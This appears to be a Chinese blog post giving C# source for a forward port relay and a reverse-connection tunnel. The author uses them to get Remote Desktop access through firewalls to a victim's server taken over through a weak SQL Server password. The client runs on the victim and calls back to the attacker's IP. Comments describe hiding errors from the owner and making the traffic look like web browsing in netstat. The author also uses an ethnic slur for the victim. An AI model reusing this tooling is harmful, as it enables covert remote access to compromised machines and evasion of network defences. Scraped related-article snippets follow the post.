3389的时候

例子1:连接a机器的3389端口连不上,因为对方防火墙或者网关做了限制,只能访问a机器的个别端口比如80。

例子2:连接a机器的几乎所有端口都连不上(对方乃内网或者防火墙网关做了限制),只能1433上去,但是对方可以连接你的某些端口。

解决

第一种较简单,只需要程序在对方开80,你连接他80,程序收到数据后,发送到他本机的3389,同时从他3389收到数据后返回到你。程序就是一个中转站。

[c-sharp] view plaincopy
  1. using System;
  2. using System<a href="http://lib.csdn.net/base/dotnet" class='replace_word' title=".NET知识库" target='_blank' style='color:#df3434; font-weight:bold;'>.NET</a>.Sockets;
  3. using System.Threading;
  4. namespace PortTransponder
  5. {
  6. class Program
  7. {
  8. static void Main(string[] args)
  9. {
  10. TcpListener tl = new TcpListener(80);//这里开对方可以被你连接并且未被占用的端口
  11. tl.Start();
  12. while (true)//这里必须用循环,可以接收不止一个客户,因为我发现终端服务有时一个端口不行就换一个端口重连
  13. {
  14. //下面的意思就是一旦程序收到你发送的数据包后立刻开2个线程做中转
  15. try
  16. {
  17. TcpClient tc1 = tl.AcceptTcpClient();//这里是等待数据再执行下边,不会100%占用cpu
  18. TcpClient tc2 = new TcpClient("localhost", 3389);
  19. tc1.SendTimeout = 300000;//设定超时,否则端口将一直被占用,即使失去连接
  20. tc1.ReceiveTimeout = 300000;
  21. tc2.SendTimeout = 300000;
  22. tc2.ReceiveTimeout = 300000;
  23. object obj1 = (object)(new TcpClient[] { tc1, tc2 });
  24. object obj2 = (object)(new TcpClient[] { tc2, tc1 });
  25. ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
  26. ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
  27. }
  28. catch { }
  29. }
  30. }
  31. public static void transfer(object obj)
  32. {
  33. TcpClient tc1 = ((TcpClient[])obj)[0];
  34. TcpClient tc2 = ((TcpClient[])obj)[1];
  35. NetworkStream ns1 = tc1.GetStream();
  36. NetworkStream ns2 = tc2.GetStream();
  37. while (true)
  38. {
  39. try
  40. {
  41. //这里必须try catch,否则连接一旦中断程序就崩溃了,要是弹出错误提示让机主看见那就囧了
  42. byte[] bt = new byte[10240];
  43. int count = ns1.Read(bt, 0, bt.Length);
  44. ns2.Write(bt, 0, count);
  45. }
  46. catch
  47. {
  48. ns1.Dispose();
  49. ns2.Dispose();
  50. tc1.Close();
  51. tc2.Close();
  52. break;
  53. }
  54. }
  55. }
  56. }
  57. }

这样在对方机器执行和,直接mstsc /v:对方ip:80就能终端上去了

第二种稍微复杂一点,需要客户机和服务器2个程序,你在自己机器上开服务器端,在对方机器上执行客户端连接你的服务器端,一旦连接上你的服务器端再开个端口让终端程序连接,对方机器上客户端再开个端口连接他自己的3389,做2次中转就可以终端上去了。

具体流程

本机ip开8080端口

对方机器连接你的8080端口,比如端口是49908

连接成功后

你的机器再开一个比如9833端口

对方机器再开一个连接连接他自己的3389,比如端口是49909吧

好这时你用你的mstsc连接自己的 localhost:9833,数据包就从本机9833-本机8080-对方49908-对方49909-对方3389,对方3389的数据反着回来就行了。

[c-sharp] view plaincopy
  1. //服务器端
  2. using System;
  3. using System.Collections.Generic;
  4. using System<a href="http://lib.csdn.net/base/dotnet" class='replace_word' title=".NET知识库" target='_blank' style='color:#df3434; font-weight:bold;'>.net</a>.Sockets;
  5. using System.Threading;
  6. namespace fanxiangserver
  7. {
  8. class Program
  9. {
  10. public static Dictionary<int, TcpClient> dic = new Dictionary<int, TcpClient>();
  11. public static NetworkStream kongzhins = null;
  12. static void Main(string[] args)
  13. {
  14. ThreadPool.QueueUserWorkItem(new WaitCallback(start1));
  15. ThreadPool.QueueUserWorkItem(new WaitCallback(start2));
  16. WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });
  17. }
  18. public static void start1(object obj)
  19. {
  20. TcpListener tl = new TcpListener(8080);//开一个对方可以连接的端口,今天这棒子机器连他只能1433,其他连不上,他连别人只能80 8080 21
  21. tl.Start();
  22. while (true)
  23. {
  24. TcpClient tc = tl.AcceptTcpClient();
  25. jieshou(tc);
  26. }
  27. }
  28. public static void start2(object obj)
  29. {
  30. TcpListener tl = new TcpListener(9833); //开一个随意端口让自己的mstsc连。
  31. tl.Start();
  32. while (true)
  33. {
  34. TcpClient tc = tl.AcceptTcpClient();
  35. Random rnd = new Random();
  36. int biaoji = rnd.Next(1000000000, 2000000000);
  37. dic.Add(biaoji, tc);
  38. byte[] bt = BitConverter.GetBytes(biaoji);
  39. kongzhins.Write(bt, 0, bt.Length);
  40. }
  41. }
  42. public static void jieshou(TcpClient tc)
  43. {
  44. //这里体现的是一个配对的问题,自己体会一下吧
  45. NetworkStream ns = tc.GetStream();
  46. byte[] bt = new byte[4];
  47. int count = ns.Read(bt, 0, bt.Length);
  48. if (count == 2 && bt[0] == 0x6f && bt[1] == 0x6b)
  49. {
  50. kongzhins = ns;
  51. }
  52. else
  53. {
  54. int biaoji = BitConverter.ToInt32(bt, 0);
  55. lianjie(biaoji, tc);
  56. }
  57. }
  58. public static void lianjie(int biaoji, TcpClient tc1)
  59. {
  60. TcpClient tc2 = null;
  61. if (dic.ContainsKey(biaoji))
  62. {
  63. dic.TryGetValue(biaoji, out tc2);
  64. dic.Remove(biaoji);
  65. tc1.SendTimeout = 300000;
  66. tc1.ReceiveTimeout = 300000;
  67. tc2.SendTimeout = 300000;
  68. tc2.ReceiveTimeout = 300000;
  69. object obj1 = (object)(new TcpClient[] { tc1, tc2 });
  70. object obj2 = (object)(new TcpClient[] { tc2, tc1 });
  71. ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
  72. ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
  73. }
  74. }
  75. public static void transfer(object obj)
  76. {
  77. TcpClient tc1 = ((TcpClient[])obj)[0];
  78. TcpClient tc2 = ((TcpClient[])obj)[1];
  79. NetworkStream ns1 = tc1.GetStream();
  80. NetworkStream ns2 = tc2.GetStream();
  81. while (true)
  82. {
  83. try
  84. {
  85. //这里必须try catch,否则连接一旦中断程序就崩溃了,要是弹出错误提示让机主看见那就囧了
  86. byte[] bt = new byte[10240];
  87. int count = ns1.Read(bt, 0, bt.Length);
  88. ns2.Write(bt, 0, count);
  89. }
  90. catch
  91. {
  92. ns1.Dispose();
  93. ns2.Dispose();
  94. tc1.Close();
  95. tc2.Close();
  96. break;
  97. }
  98. }
  99. }
  100. }
  101. }
[c-sharp] view plaincopy
  1. //客户端
  2. using System;
  3. using System.Text;
  4. using System<a href="http://lib.csdn.net/base/dotnet" class='replace_word' title=".NET知识库" target='_blank' style='color:#df3434; font-weight:bold;'>.Net</a>.Sockets;
  5. using System.Threading;
  6. namespace fanxiangclient
  7. {
  8. class Program
  9. {
  10. public static NetworkStream kongzhins = null;
  11. static void Main(string[] args)
  12. {
  13. try
  14. {
  15. TcpClient tc = new TcpClient("你的IP", 8080);
  16. kongzhins = tc.GetStream();
  17. byte[] bt = Encoding.Default.GetBytes("ok");//这里发送一个连接提示
  18. kongzhins.Write(bt, 0, bt.Length);
  19. jieshou();
  20. WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });//这里为什么要这样呢?我发现sqlserver执行是localsystem账号如果console.read()程序马上退出
  21. }
  22. catch { }
  23. }
  24. public static void jieshou()
  25. {
  26. while (true)
  27. {
  28. byte[] bt = new byte[4];
  29. kongzhins.Read(bt, 0, bt.Length);
  30. TcpClient tc1 = new TcpClient("你的IP", 8080);
  31. TcpClient tc2 = new TcpClient("localhost", 3389);
  32. tc1.SendTimeout = 300000;
  33. tc1.ReceiveTimeout = 300000;
  34. tc2.SendTimeout = 300000;
  35. tc2.ReceiveTimeout = 300000;
  36. tc1.GetStream().Write(bt, 0, bt.Length);
  37. object obj1 = (object)(new TcpClient[] { tc1, tc2 });
  38. object obj2 = (object)(new TcpClient[] { tc2, tc1 });
  39. ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
  40. ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
  41. }
  42. }
  43. public static void transfer(object obj)
  44. {
  45. TcpClient tc1 = ((TcpClient[])obj)[0];
  46. TcpClient tc2 = ((TcpClient[])obj)[1];
  47. NetworkStream ns1 = tc1.GetStream();
  48. NetworkStream ns2 = tc2.GetStream();
  49. while (true)
  50. {
  51. try
  52. {
  53. byte[] bt = new byte[10240];
  54. int count = ns1.Read(bt, 0, bt.Length);
  55. ns2.Write(bt, 0, count);
  56. }
  57. catch
  58. {
  59. ns1.Dispose();
  60. ns2.Dispose();
  61. tc1.Close();
  62. tc2.Close();
  63. break;
  64. }
  65. }
  66. }
  67. }
  68. }

好,这样你连接mstsc /v:localhost:9833,后数据就经过了好几转转到了对方的3389上。这样即使对方是内网也可以被终端了,而且好处是对方查看netstat -an看到的是这种东西

활성 연결

프로토콜  로컬 주소           외부 주소              상태
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING
  TCP    他的IP:139             0.0.0.0:0              LISTENING
  TCP    他的IP:49908           我的IP:8080            ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:3389              [::]:0                 LISTENING
  TCP    [::]:5357              [::]:0                 LISTENING
  TCP    [::]:49152             [::]:0                 LISTENING
  TCP    [::]:49153             [::]:0                 LISTENING
  TCP    [::]:49154             [::]:0                 LISTENING
  TCP    [::]:49155             [::]:0                 LISTENING
  TCP    [::]:49156             [::]:0                 LISTENING
  TCP    [::]:49157             [::]:0                 LISTENING
  TCP    [::1]:3389             [::1]:49909            ESTABLISHED
  TCP    [::1]:49909            [::1]:3389             ESTABLISHED
  UDP    0.0.0.0:123            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1434           *:*
  UDP    0.0.0.0:3702           *:*
  UDP    0.0.0.0:3702           *:*
  UDP    0.0.0.0:4500           *:*
  UDP    0.0.0.0:5355           *:*
  UDP    0.0.0.0:64966          *:*
  UDP    他的IP:137             *:*
  UDP    他的IP:138             *:*
  UDP    [::]:123               *:*
  UDP    [::]:500               *:*
  UDP    [::]:3702              *:*
  UDP    [::]:3702              *:*
  UDP    [::]:5355              *:*
  UDP    [::]:64967             *:*

只能看到他的49908在连接我的8080,就像看网站一样,要是80就更像了,而49909连接3389一般注意不到,反正没有ip地址,这棒子想不到吧,他做的这么变态的限制都被终端上去了,起因就是sqlserver弱口令和权限,这个机器是win2008,i7 920的u,不明白棒子的网管为什么一点安全知识都没有,而且屡教不改,上次进去一看,那机器已经被国内黑克给x了n遍了,上边布满了木马,最后实在启动不了了,他重装了,结果那个sqlserver还是那个权限还是那个密码,服气吧。但是如果netstat -ano发现连我的pid和连3389的pid是一个那就可以发现了。

以上程序都是经我测试后非常ok的,但是没有经过优化,尤其是反向连接的,可以做成个服务是吧,或者连接的时候加个验证啦什么的,还有我的Ip地址也是变的,可以做成个服务,定时读取某一网页上我的新ip,告诉他连还是不连啦,什么的。而且还可以做成个http代理翻wall啦,总之花样是很多的。

2010年9月10日下午18点更正反向连接的一个小问题,即连接配对的问题,这样的话只要肉鸡反向连接到你的服务器端,你可以开多个终端上去用不同的账号同时登陆了。

看到好多人说cpu占用率高什么的,我补充一句,我给出代码的目的是告诉大家端口转发的方法和思路,并不是让你直接粘过去用,如果那样的话我直接编译成exe不就完了吗,授人以鱼不如授人以渔对吧,所以大家看明白了怎么回事自己去改和优化,像缓冲区大小是否合适啦,超时啦,连接判断啦什么的,这些都是要自己去优化的,所以代码很短嘛,就是为了让大家看的简单明了,所以直接用的话效率不会很高,但这是个完整骨架,我自己用的就在这段骨架的基础上优化并增加了很多功能,而且cpu占用率内存占用都是没有问题的。

c#做端口转发程序支持正向连接和反向链接相关推荐

  1. linux 设置mysql端口转发_linux使用socat进行端口转发,支持tcp/udp数据转发

    端口转发程序已经介绍过rinetd了,但是rinetd不支持域名动态解析功能,如果域名对应的ip发生改变,需要重新才能重新加载新的地址.这里自然找到了端口转发工具socat,它完美的解决了动态dns的 ...

  2. 内网中设备通过一台主机做端口转发联通外网( TPLink路由映射,端口转发,windows自带端口转发netsh interface portproxy)

    文章目录 背景描述 需求 方案 配置有限网卡和路由器 在windows上做端口转发 背景描述 一台可以联通外网的路由器(tplink) 一台有无线网卡的计算机 n台内网设备 需求 需要让所有的设备都可 ...

  3. linux访问ftp带端口,使用iptables做端口转发访问ftp

    用iptables做端口转发是个很实用的功能,可以让我们忽略协议细节而实现透明转发,对于加密的数据传输更是好用. ftp协议不同于http协议,因为ftp的控制端口和数据端口是分离的,在被动模式下,数 ...

  4. php做端口转发,利用PHP和linux shell在ubuntu服务器实现自动端口转发

    前言: 在用动态ip分配协议的网络环境下远程控制自己的主机最烦的就是ip会经常改变,而安装teamviewer这些软件又没有用rdp那么快速,所以经常开机后第一件事就是把ip地址记下来,然后再从其他机 ...

  5. 使用ssh做端口转发

    有时候Linux服务器上的某些服务监听的是本地(localhost,127.0.0.1)的端口,外部无法直接访问该服务,可以使用以下命令做端口转发: ssh -N -f -L 0.0.0.0:9091 ...

  6. 用Nginx做端口转发(反向代理)

    用Nginx做端口转发(反向代理) 将域名转发到本地端口 将域名转发到另一个域名 本地一个端口转发到另一个端口或另一个域名 加 / 与不加 / 有时我们会使用一些java或node应用,但又不想让他们 ...

  7. 电信宽带无法做端口转发

    电信宽带无法做端口转发 如需转载请标明出处:http://blog.csdn.net/itas109 QQ技术交流群:129518033 文章目录 电信宽带无法做端口转发 前言 1.运营商问题 2.防 ...

  8. SSH正向连接和反向连接

    ssh命令是openssh套件中的客户端连接工具,可以给予ssh加密协议实现安全的远程登录服务器. 反向连接是什么? 平时大多数使用ssh命令是控制端主机主动连接受控端主机,通过这个连接控制端主机可以 ...

  9. 正向连接和反向连接的概念

    正向连接和反向连接 正向连接 正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有公网ip的情况下.例如下面,受害主机具有公网ip,被控主机kali可以通过ip地址访 ...

最新文章

  1. 字典、列表、元祖、字符串的综合(1)
  2. CentOS 关闭、启动网卡
  3. mysql 存储过程月单拆天单_MySQL之存储过程按月创建表的方法步骤
  4. sublime快捷键代码对齐_Python配置sublime运行环境
  5. c++ mmap写入速度_Linux系统编程_用mmap+数组的方式修改数据文件
  6. LeetCode 353. 贪吃蛇(deque+set)
  7. 如何在DevSecOps道路上快速、安全地抵达终点
  8. 实用工具类APP,海外大有可为
  9. ios网络相关问题-HTTP特点
  10. Unity线程安全:CompareBaseObjectsInternal can only be called from the main thread
  11. Worktile Teambition 与Tower 使用对比
  12. python:NBA比赛数据分析
  13. 微信打不开MP4文件 (记录编码问题)
  14. PDF文件添加图片、文字合成(java)
  15. oracle 插入表数据时,自动生成ID
  16. Cesium的学习之路(二):底图切换
  17. 联通iphone4新政,粗暴挟制用户不应该
  18. 谷歌正在教AI人类如何拥抱,做菜,和打架
  19. linux安装tcping
  20. exFAT移动硬盘写保护怎么去掉

热门文章

  1. 定位pure virtual method called问题
  2. 160 - 8 Andrnalin.1
  3. leetcode 45. 跳跃游戏 II 思考分析
  4. LeetCode 27.移除元素 思考分析
  5. rtmp协议分析(三次握手)
  6. python批量生成图片_利用Python批量生成任意尺寸的图片
  7. 20160818_周报日志之二
  8. 474. 一和零 golang动态规划
  9. node.js 获取异步方法里面的数据 =》 两种方式
  10. 详解Linux下通过yum安装Mariadb/MySQL数据库(腾讯云也适用)